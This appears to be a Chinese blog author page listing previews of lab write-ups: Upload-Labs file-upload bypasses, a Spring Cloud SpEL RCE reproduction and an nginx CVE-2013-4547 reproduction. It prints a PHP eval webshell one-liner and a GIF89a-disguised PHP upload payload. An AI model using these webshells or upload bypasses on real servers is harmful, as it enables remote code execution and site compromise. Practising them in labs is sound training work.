网络安全
wwang135
这个作者很懒,什么都没留下…
展开
-
Upload-Labs靶场1-4
用的buu的靶场Pass-01查看源码发现进行了限制一句话木马:<?php @eval($_POST['key']);?>用bp将yjhmm.jpg修改为yjhmm.php然后放包过去上传地址:http://ca713556-ace3-46a0-be37-2972e851bfa3.node4.buuoj.cn:81/upload/yjhmm.php然后用蚁剑连接Pass-02查看源码对文件类型进行了限制这里和Pass-01一样.原创 2022-04-18 12:42:31 · 2113 阅读 · 0 评论 -
【Nday】Spring-Cloud-SpEL-RCE漏洞复现
Spring-Cloud-SpEL-RCE漏洞复现原创 2022-03-30 12:08:02 · 4504 阅读 · 0 评论 -
nginx漏洞复现
C V E - 2 0 1 3 - 4 5 4 7构建并启动容器1.2.访问网址IP地址3.上传图片文件bp抓包在<?php phpinfo();?>前面加上GIF89a??改成图片文件4.bp send放包过去/uploadfiles/a7c3ce076585477741d951d179ab07dc.jpg在网址后面加上这个文件返回的上传路径5.最后成功复现...原创 2022-03-21 17:37:18 · 6825 阅读 · 0 评论